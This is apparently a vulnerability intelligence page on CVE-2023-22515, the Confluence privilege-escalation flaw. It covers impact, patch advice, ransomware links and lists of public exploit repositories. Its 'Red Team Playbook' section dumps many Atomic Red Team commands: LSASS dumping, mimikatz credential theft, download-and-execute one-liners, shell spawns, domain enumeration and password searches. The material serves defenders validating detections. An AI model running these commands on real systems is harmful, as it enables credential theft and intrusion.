CVE-2023-22515
Overview
This vulnerability is a broken access control flaw in Atlassian Confluence Data Center and Server that allows unauthorized privilege escalation. The root cause is improper validation of setup and administrative endpoints, enabling unauthenticated users to manipulate the administrator account creation process. The affected components include the setup and login endpoints of Confluence Data Center and Server instances that are publicly accessible.
Vulnerability Description
Atlassian has been made aware of an issue reported by a handful of customers where external attackers may have exploited a previously unknown vulnerability in publicly accessible Confluence Data Center and Server instances to create unauthorized Confluence administrator accounts and access Confluence instances. Atlassian Cloud sites are not affected by this vulnerability. If your Confluence site is accessed via an atlassian.net domain, it is hosted by Atlassian and is not vulnerable to this issue.
Impact
An unauthenticated attacker can create new administrator accounts on vulnerable Confluence Data Center and Server instances, gaining full administrative privileges without any user interaction or prior authentication. This allows complete control over the Confluence environment, including access to all data, configuration changes, and potential lateral movement within the network. The compromise can lead to data breaches, unauthorized modifications, and disruption of business operations.
Solution
Apply the latest patches provided by Atlassian as detailed in their official security advisory at https://confluence.atlassian.com/security/cve-2023-22515-privilege-escalation-vulnerability-in-confluence-data-center-and-server-1295682276.html. Ensure your Confluence Data Center and Server installations are updated to the fixed versions specified by Atlassian. Atlassian Cloud customers are not affected. Follow the vendor's instructions precisely to remediate the broken access control issue and verify that public access to setup endpoints is properly restricted.
EPSS vs KEV Prediction — Evolution (30 days)
Ransomware Intelligence
Confirmed Groups
| Group | Victims | Source |
|---|---|---|
|
ransomhub
|
842 | ransomware.live |
Correlated Groups
Correlations are established through analysis of shared tools, tactics, and infrastructure between threat groups and vulnerabilities. They do not represent direct confirmation of exploitation.
| Group | Confidence | Victims | Source |
|---|---|---|---|
|
Ukrainian Cyber Alliance
|
MEDIUM | — | correlation_misp |
Predictions
Predictions are based on analysis of past ransomware group behaviors and their predilection for specific vulnerability characteristics, such as vendor, product, and flaw type.
The groups below are predictions based on historical exploitation patterns of the same vendor/product. These are not confirmations.
Full Analysis
The vulnerability in question pertains to a critical security flaw within specific versions of Confluence Data Center and Server instances. This issue allows external attackers to exploit the system to create unauthorized administrator accounts. The flaw arises from inadequate access controls, which fail to properly authenticate and authorize requests made to the administrative functionalities of the software. As a result, attackers can gain elevated privileges without legitimate credentials, thereby compromising the integrity and confidentiality of the affected Confluence instances. This vulnerability underscores the importance of robust security measures in enterprise software, particularly those that are publicly accessible.
Attack vectors for this vulnerability are particularly concerning, as they enable a range of exploitation scenarios. An attacker with knowledge of the vulnerability could potentially send crafted requests to the Confluence server, bypassing authentication mechanisms. This could be executed through various means, including automated scripts or manual exploitation techniques. Once an unauthorized administrator account is created, the attacker gains full control over the Confluence instance, allowing them to manipulate content, exfiltrate sensitive information, and potentially pivot to other systems within the organization’s network. The ease of exploitation, combined with the high privileges granted, makes this vulnerability a prime target for malicious actors.
The real-world impact of this vulnerability can be severe, posing significant business risks to organizations relying on Confluence for collaboration and documentation. Unauthorized access to administrative functionalities can lead to data breaches, loss of intellectual property, and reputational damage. Organizations may face regulatory scrutiny and financial penalties if sensitive data is compromised. Additionally, the potential for operational disruption is high, as attackers could alter or delete critical documentation, impacting business continuity. The high CVSS score of 9.8 indicates the critical nature of this vulnerability, emphasizing the urgent need for organizations to address it promptly.
Detection and mitigation strategies are essential for organizations to safeguard their Confluence instances. Regular vulnerability assessments and penetration testing can help identify potential weaknesses before they are exploited. Organizations should also implement strict access controls, ensuring that only authorized personnel have administrative privileges. Monitoring logs for unusual activity, such as the creation of new administrator accounts, can aid in early detection of exploitation attempts. Furthermore, applying security patches and updates provided by Atlassian is crucial to mitigate the risk associated with this vulnerability. Organizations should also consider employing web application firewalls (WAFs) to filter and monitor HTTP traffic, providing an additional layer of security against potential attacks.
In conclusion, the vulnerability affecting Confluence Data Center and Server instances represents a significant threat to organizations using this platform. The ability for attackers to create unauthorized administrator accounts poses a critical risk, with the potential for severe business impacts. By understanding the technical details, attack vectors, and real-world implications, organizations can better prepare their defenses. Implementing effective detection and mitigation strategies will be vital in protecting sensitive information and maintaining the integrity of their Confluence environments.
CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting CVE-2023-22515, accompanied by an increase in associated ransomware groups leveraging this vulnerability. Our telemetry indicates a significant rise in attacker activity, reflecting a growing operational interest in exploiting the critical privilege escalation flaw within Atlassian Confluence Data Center and Server instances. The CVSS score adjustment to a perfect 10.0 underscores the heightened severity and potential impact of successful exploitation. Notably, the expansion of ransomware actors linked to this vulnerability signals an evolving threat landscape where initial unauthorized access is increasingly followed by ransomware deployment, amplifying the risk to affected organizations. Although the Exploit Prediction Scoring System (EPSS) remains stable, the surge in real-world exploitation attempts and the proliferation of publicly available proof-of-concept exploits heighten the immediacy of the threat. This development elevates the overall risk posture, emphasizing that defenders must recognize CVE-2023-22515 as a critical vector for both privilege escalation and ransomware intrusion campaigns.
Update 2 — May 23, 2026
CSURFACE threat intelligence has detected a slight increase in exploitation attempts targeting CVE-2023-22515, accompanied by a marginal rise in the EPSS score, indicating sustained attacker interest and activity. This uptick, while modest, aligns with the continued availability and refinement of multiple proof-of-concept exploits circulating publicly, which lowers the barrier for adversaries to conduct unauthorized privilege escalations within Atlassian Confluence Data Center environments. The persistence of ransomware-linked threat actors leveraging this vulnerability underscores its dual role as both an initial access vector and a facilitator for subsequent ransomware deployment. Consequently, the threat landscape remains dynamic, with the vulnerability maintaining a critical risk profile. Defenders should interpret this development as a signal that exploitation attempts are ongoing and that the operational tempo of associated ransomware campaigns may intensify, warranting heightened vigilance despite the stable EPSS metric.
Update 3 — July 06, 2026
CSURFACE threat intelligence has detected a slight increase in exploitation attempts targeting CVE-2023-22515, accompanied by the emergence of additional publicly available proof-of-concept exploits. Although the overall exploit trend remains steady without rapid escalation, the continued refinement and dissemination of these exploit tools lower the barrier for threat actors to leverage this vulnerability. Notably, ransomware-linked groups remain active in campaigns exploiting this flaw, reinforcing its role as a preferred vector for initial access and privilege escalation. The recent adjustment of the CVSS score to 9.8, while marginal, reflects a more precise risk characterization but does not diminish the critical severity of the vulnerability. Defenders should recognize that despite a stable EPSS score and a slight uptick in exploitation telemetry, the operational tempo of associated ransomware campaigns could intensify, sustaining a high threat level for affected Confluence Data Center environments.
Affected Products (6)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Atlassian | Confluence Data Center | All |
cpe:2.3:a:atlassian:confluence_data_center:*:*:*:*:*:*:*:*
|
|
|
Atlassian | Confluence Data Center | All |
cpe:2.3:a:atlassian:confluence_data_center:*:*:*:*:*:*:*:*
|
|
|
Atlassian | Confluence Data Center | All |
cpe:2.3:a:atlassian:confluence_data_center:*:*:*:*:*:*:*:*
|
|
|
Atlassian | Confluence Server | All |
cpe:2.3:a:atlassian:confluence_server:*:*:*:*:*:*:*:*
|
|
|
Atlassian | Confluence Server | All |
cpe:2.3:a:atlassian:confluence_server:*:*:*:*:*:*:*:*
|
|
|
Atlassian | Confluence Server | All |
cpe:2.3:a:atlassian:confluence_server:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (2)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
Atlassian Confluence Data Center and Server Authentication Bypass via Broken Access Control
auxiliary/admin/http/atlassian_confluence_auth_bypass
|
Unknown, Emir Polat | Unknown | - | View |
|
Atlassian Confluence Unauthenticated Remote Code Execution
exploits/multi/http/atlassian_confluence_rce_cve_2023_22515
|
sfewer-r7 | Unknown | - | View |
GitHub PoCs (31)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
Chocapikk/CVE-2023-22515
CVE-2023-22515: Confluence Broken Access Control Exploit
|
Chocapikk | 153 | 32 | 2023-10-10 | View |
|
ad-calcium/CVE-2023-22515
Confluence未授权添加管理员用户(CVE-2023-22515)漏洞利用工具
|
ad-calcium | 110 | 8 | 2023-10-11 | View |
|
ErikWynter/CVE-2023-22515-Scan
Scanner for CVE-2023-22515 - Broken Access Control Vulnerability in Atlassian Confluence
|
ErikWynter | 80 | 6 | 2023-10-06 | View |
|
AIex-3/confluence-hack
CVE-2023-22515
|
AIex-3 | 52 | 7 | 2023-10-30 | View |
|
K4ptor/CVE-2023-22515
Confluence Unauthorized Administrator User Addition Exploitation Script
|
K4ptor | 25 | 3 | 2023-10-12 | View |
|
aaaademo/Confluence-EvilJar
配合 CVE-2023-22515 后台上传jar包实现RCE
|
aaaademo | 23 | 4 | 2023-11-09 | View |
|
youcannotseemeagain/CVE-2023-22515_RCE
Confluence后台rce
|
youcannotseemeagain | 20 | 5 | 2023-10-20 | View |
|
j3seer/CVE-2023-22515-POC
Poc for CVE-2023-22515
|
j3seer | 8 | 2 | 2023-10-10 | View |
|
Le1a/CVE-2023-22515
Confluence Data Center & Server 权限提升漏洞 Exploit
|
Le1a | 6 | 1 | 2023-10-13 | View |
|
kh4sh3i/CVE-2023-22515
CVE-2023-22515 - Broken Access Control Vulnerability in Confluence Data Center and Server
|
kh4sh3i | 5 | 0 | 2023-10-11 | View |
|
spareack/CVE-2023-22515-NSE
Vulnerability checking tool via Nmap Scripting Engine
|
spareack | 4 | 0 | 2024-07-18 | View |
|
LucasPDiniz/CVE-2023-22515
Server Broken Access Control in Confluence - CVE-2023-22515
|
LucasPDiniz | 2 | 1 | 2023-11-08 | View |
|
Vulnmachines/confluence-cve-2023-22515
Confluence Broken Access Control
|
Vulnmachines | 3 | 0 | 2023-10-13 | View |
|
fyx1t/NSE--CVE-2023-22515
NSE script for checking the presence of CVE-2023-22515
|
fyx1t | 2 | 0 | 2024-04-26 | View |
|
iveresk/CVE-2023-22515
iveresk-CVE-2023-22515
|
iveresk | 1 | 0 | 2023-10-13 | View |
|
C1ph3rX13/CVE-2023-22515
CVE-2023-22515
|
C1ph3rX13 | 1 | 0 | 2023-10-27 | View |
|
rxerium/CVE-2023-22515
Atlassian Confluence Data Center and Server Broken Access Control Vulnerability
|
rxerium | 1 | 0 | 2024-02-24 | View |
|
Arkha-Corvus/LetsDefend-SOC235-Atlassian-Confluence-Broken-Access-Control-0-Day-CVE-2023-22515-EventID-197
I was presented with a high-severity alert indicating a potential exploit attempt of CVE-2023-22515, a zero-day vulnerab...
|
Arkha-Corvus | 1 | 0 | 2025-10-24 | View |
|
dkq-k/CVE-2023-22515
|
dkq-k | 0 | 0 | 2026-01-16 | View |
|
CalegariMindSec/Exploit-CVE-2023-22515
A simple exploit for CVE-2023-22515
|
CalegariMindSec | 0 | 0 | 2024-01-02 | View |
|
xorbbo/cve-2023-22515
NSE script to check if app is vulnerable to cve-2023-22515
|
xorbbo | 0 | 0 | 2024-06-08 | View |
|
INTfinityConsulting/cve-2023-22515
Confluence broken access control to code execution
|
INTfinityConsulting | 0 | 0 | 2023-11-29 | View |
|
CyberSentinel321/cve-2023-22515-lab
Hands-on security lab demonstrating CVE-2023-22515 — Atlassian Confluence Authentication Bypass using a simulated vulner...
|
CyberSentinel321 | 0 | 0 | 2025-11-21 | View |
|
Onedy1703/CVE-2023-22515-Confluence
CVE 2023-22515
|
Onedy1703 | 0 | 0 | 2024-07-21 | View |
|
dkq-k/cve-2023-22515-1
|
dkq-k | 0 | 0 | 2026-01-16 | View |
|
killvxk/CVE-2023-22515-joaoviictorti
CVE-2023-22515 (Confluence Broken Access Control Exploit)
|
killvxk | 0 | 0 | 2024-11-05 | View |
|
vivigotnotime/CVE-2023-22515-Exploit-Script
|
vivigotnotime | 0 | 0 | 2025-02-24 | View |
|
edsonjt81/CVE-2023-22515-Scan.
|
edsonjt81 | 0 | 0 | 2023-11-26 | View |
|
tranphuc2005/CVE-2023-22515
|
tranphuc2005 | 0 | 0 | 2025-09-06 | View |
|
s1d6point7bugcrowd/CVE-2023-22515-check
This script will inform the user if the Confluence instance is vulnerable, but it will not proceed with the exploitation...
|
s1d6point7bugcrowd | 0 | 0 | 2024-06-05 | View |
|
DsaHen/cve-2023-22515-exp
cve-2023-22515的python利用脚本
|
DsaHen | 0 | 0 | 2023-10-21 | View |
Ransomware Groups 2
Threat Feed
41 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Ransomware group known to exploit this vulnerability. Tools: Acronis Disk Director, Angry IP Scanner, AnyDesk, Atera, BITSAdmin (842 known victims)
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Ransomware group known to exploit this vulnerability (30 known victims)
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability. Tools: Advanced IP Scanner, Advanced Port Scanner, AnyDesk, Bloodhound, Cloudflared (1529 known victims)
Ransomware group known to exploit this vulnerability. Tools: Acronis Disk Director, Angry IP Scanner, AnyDesk, Atera, BITSAdmin (842 known victims)
Ransomware group known to exploit this vulnerability (274 known victims)
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Proof-of-concept code is publicly available for this vulnerability
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Deployed role: Linux · Web Server
Kill chain derived from the ML classifier. Pick the target OS above to see the OS-specific path and matching playbook.
Attack Vectors ML
MITRE ATT&CK Techniques (10)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
108 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
"#{procdump_exe}" -accepteula -mm lsass.exe #{output_file}
$exePath = resolve-path "$env:ProgramFiles\dotnet\shared\Microsoft.NETCore.App\5*\createdump.exe"
& "$exePath" -u -f $env:Temp\dotnet-lsass.dmp (Get-Process lsass).id
PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe --silent-process-exit "#{output_folder}"
PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe -w "%temp%\nanodump.dmp"
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
try{ IEX (IWR 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1003.001/src/Out-Minidump.ps1') -ErrorAction Stop}
catch{ $_; exit $_.Exception.Response.StatusCode.Value__}
get-process lsass | Out-Minidump
"#{procdump_exe}" -accepteula -ma lsass.exe #{output_file}
C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).id $env:TEMP\lsass-comsvcs.dmp full
"#{dumpert_exe}"
#{xordump_exe} -out #{output_file} -x 0x41
if (Test-Path -Path "$env:SystemRoot\System32\rdrleakdiag.exe") {
$binary_path = "$env:SystemRoot\System32\rdrleakdiag.exe"
} elseif (Test-Path -Path "$env:SystemRoot\SysWOW64\rdrleakdiag.exe") {
$binary_path = "$env:SystemRoot\SysWOW64\rdrleakdiag.exe"
} else {
$binary_path = "File not found"
exit 1
}
$lsass_pid = get-process lsass |select -expand id
if (-not (Test-Path -Path"$env:TEMP\t1003.001-13-rdrleakdiag")) {New-Item -ItemType Directory -Path $env:TEMP\t1003.001-13-rdrleakdiag -Force}
write-host $binary_path /p $lsass_pid /o $env:TEMP\t1003.001-13-rdrleakdiag /fullmemdmp /wait 1
& $binary_path /p $lsass_pid /o $env:TEMP\t1003.001-13-rdrleakdiag /fullmemdmp /wait 1
Write-Host "Minidump file, minidump_$lsass_pid.dmp can be found inside $env:TEMP\t1003.001-13-rdrleakdiag directory."
"#{venv_path}\Scripts\pypykatz" live lsa
#{mimikatz_exe} "sekurlsa::minidump #{input_file}" "sekurlsa::logonpasswords full" exit
IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimikatz -DumpCreds
"#{psexec_exe}" #{remote_host} -accepteula -c #{command_path}
cmd.exe /Q /c #{command_to_execute} 1> \\127.0.0.1\ADMIN$\#{output_file} 2>&1
New-PSDrive -name #{map_name} -psprovider filesystem -root \\#{computer_name}\#{share_name}
cmd.exe /c "net use \\#{computer_name}\#{share_name} #{password} /u:#{user_name}"
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -Execute -ErrorAction Stop
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -Execute -ErrorAction Stop
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop
# creating a custom nslookup function that will indeed call nslookup but forces the result to be "whoami"
# this would not be part of a real attack but helpful for this simulation
function nslookup { &"$env:windir\system32\nslookup.exe" @args | Out-Null; @("","whoami")}
powershell .(nslookup -q=txt example.com 8.8.8.8)[-1]
Powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/a0dfca7056ef20295b156b8207480dc2465f94c3/Invoke-AppPathBypass.ps1'); Invoke-AppPathBypass -Payload 'C:\Windows\System32\cmd.exe'"
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{mimurl}'); Invoke-Mimikatz -DumpCreds"
$url='https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1';$wshell=New-Object -ComObject WScript.Shell;$reg='HKCU:\Software\Microsoft\Notepad';$app='Notepad';$props=(Get-ItemProperty $reg);[Void][System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');@(@('iWindowPosY',([String]([System.Windows.Forms.Screen]::AllScreens)).Split('}')[0].Split('=')[5]),@('StatusBar',0))|ForEach{SP $reg (Item Variable:_).Value[0] (Variable _).Value[1]};$curpid=$wshell.Exec($app).ProcessID;While(!($title=GPS|?{(Item Variable:_).Value.id-ieq$curpid}|ForEach{(Variable _).Value.MainWindowTitle})){Start-Sleep -Milliseconds 500};While(!$wshell.AppActivate($title)){Start-Sleep -Milliseconds 500};$wshell.SendKeys('^o');Start-Sleep -Milliseconds 500;@($url,(' '*1000),'~')|ForEach{$wshell.SendKeys((Variable _).Value)};$res=$Null;While($res.Length -lt 2){[Windows.Forms.Clipboard]::Clear();@('^a','^c')|ForEach{$wshell.SendKeys((Item Variable:_).Value)};Start-Sleep -Milliseconds 500;$res=([Windows.Forms.Clipboard]::GetText())};[Windows.Forms.Clipboard]::Clear();@('%f','x')|ForEach{$wshell.SendKeys((Variable _).Value)};If(GPS|?{(Item Variable:_).Value.id-ieq$curpid}){@('{TAB}','~')|ForEach{$wshell.SendKeys((Item Variable:_).Value)}};@('iWindowPosDY','iWindowPosDX','iWindowPosY','iWindowPosX','StatusBar')|ForEach{SP $reg (Item Variable:_).Value $props.((Variable _).Value)};IEX($res);invoke-mimikatz -dumpcr
Add-Content -Path #{ads_file} -Value 'Write-Host "Stream Data Executed"' -Stream 'streamCommand'
$streamcommand = Get-Content -Path #{ads_file} -Stream 'streamcommand'
Invoke-Expression $streamcommand
powershell.exe -e #{obfuscated_code}
# Encoded payload in next command is the following "Set-Content -path "$env:SystemRoot/Temp/art-marker.txt" -value "Hello from the Atomic Red Team""
reg.exe add "HKEY_CURRENT_USER\Software\Classes\AtomicRedTeam" /v ART /t REG_SZ /d "U2V0LUNvbnRlbnQgLXBhdGggIiRlbnY6U3lzdGVtUm9vdC9UZW1wL2FydC1tYXJrZXIudHh0IiAtdmFsdWUgIkhlbGxvIGZyb20gdGhlIEF0b21pYyBSZWQgVGVhbSI=" /f
iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\AtomicRedTeam').ART)))
$malcmdlets = #{Malicious_cmdlets}
foreach ($cmdlets in $malcmdlets) {
"function $cmdlets { Write-Host Pretending to invoke $cmdlets }"}
foreach ($cmdlets in $malcmdlets) {
$cmdlets}
New-PSSession -ComputerName #{hostname_to_connect}
Test-Connection $env:COMPUTERNAME
Set-Content -Path $env:TEMP\T1086_PowerShell_Session_Creation_and_Use -Value "T1086 PowerShell Session Creation and Use"
Get-Content -Path $env:TEMP\T1086_PowerShell_Session_Creation_and_Use
Remove-Item -Force $env:TEMP\T1086_PowerShell_Session_Creation_and_Use
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
iex(iwr https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/d943001a7defb5e0d1657085a77a0e78609be58f/Privesc/PowerUp.ps1 -UseBasicParsing)
Invoke-AllChecks
powershell.exe -exec bypass -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','#{url}',$False);$comMsXml.Send();IEX $comMsXml.ResponseText"
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -noprofile "$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load('#{url}');$Xml.command.a.execute | IEX"
C:\Windows\system32\cmd.exe /c "mshta.exe javascript:a=GetObject('script:#{url}').Exec();close()"
import-module "PathToAtomicsFolder\..\ExternalPayloads\SharpHound.ps1"
try { Invoke-BloodHound -OutputDirectory $env:Temp }
catch { $_; exit $_.Exception.HResult}
Start-Sleep 5
write-host "Remote download of SharpHound.ps1 into memory, followed by execution of the script" -ForegroundColor Cyan
IEX (New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1');
Invoke-BloodHound -OutputDirectory $env:Temp
Start-Sleep 5
#{soaphound_path} --user $(#{user})@$(#{domain}) --password #{password} --dc #{dc} --buildcache --cachefilename #{cachefilename}
#{soaphound_path} --user #{user} --password #{password} --domain #{domain} --dc #{dc} --bhdump --cachefilename #{cachefilename} --outputdirectory #{outputdirectory}
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
ldapdomaindump -u #{username} -p #{password} #{target_ip} -o /tmp/T1087
ldapsearch -H ldap://#{domain}.#{top_level_domain}:389 -x -D #{user} -w #{password} -b "CN=Users,DC=#{domain},DC=#{top_level_domain}" -s sub -a always -z 1000 dn
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -sc admincountdmp #{optional_args}
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -sc exchaddresses #{optional_args}
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -f (objectcategory=person) #{optional_args}
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -default -s base lockoutduration lockoutthreshold lockoutobservationwindow maxpwdage minpwdage minpwdlength pwdhistorylength pwdproperties
Invoke-Expression "#{adrecon_path}"
([adsisearcher]"objectcategory=user").FindAll(); ([adsisearcher]"objectcategory=user").FindOne()
Get-ADObject -LDAPFilter '(UserAccountControl:1.2.840.113556.1.4.803:=#{uac_prop})' -Server #{domain}
net user administrator /domain
(([adsisearcher]'(objectcategory=organizationalunit)').FindAll()).Path | %{if(([ADSI]"$_").gPlink){Write-Host "[+] OU Path:"([ADSI]"$_").Path;$a=((([ADSI]"$_").gplink) -replace "[[;]" -split "]");for($i=0;$i -lt $a.length;$i++){if($a[$i]){Write-Host "Policy Path[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).Path;Write-Host "Policy Name[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).DisplayName} };Write-Output "`n" }}
(([adsisearcher]'').SearchRooT).Path | %{if(([ADSI]"$_").gPlink){Write-Host "[+] Domain Path:"([ADSI]"$_").Path;$a=((([ADSI]"$_").gplink) -replace "[[;]" -split "]");for($i=0;$i -lt $a.length;$i++){if($a[$i]){Write-Host "Policy Path[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).Path;Write-Host "Policy Name[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).DisplayName} };Write-Output "`n" }}
net user /domain
net group /domain
net user /domain
get-localgroupmember -group Users
get-aduser -filter *
query user /SERVER:#{computer_name}
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainUser -verbose
cd "PathToAtomicsFolder\..\ExternalPayloads"
.\kerbrute.exe userenum -d #{Domain} --dc #{DomainController} "PathToAtomicsFolder\..\ExternalPayloads\username.txt"
Get-ADComputer #{hostname} -Properties *
Get-adcomputer -SearchScope subtree -filter "name -like '*'" -Properties *
Get-ADComputer #{hostname} -Properties ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
& "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -h #{domain} -s subtree -f "objectclass=computer" *
& "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -h #{domain} -s subtree -f "objectclass=computer" ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
$target = $env:LOGONSERVER
$target = $target.Trim("\\")
$IpAddress = [System.Net.Dns]::GetHostAddresses($target) | select IPAddressToString -ExpandProperty IPAddressToString
wmic.exe /node:$IpAddress process call create 'wevtutil epl Security C:\\ntlmusers.evtx /q:\"Event[System[(EventID=4776)]]"'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
generaldomaininfo -noninteractive -consoleoutput
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
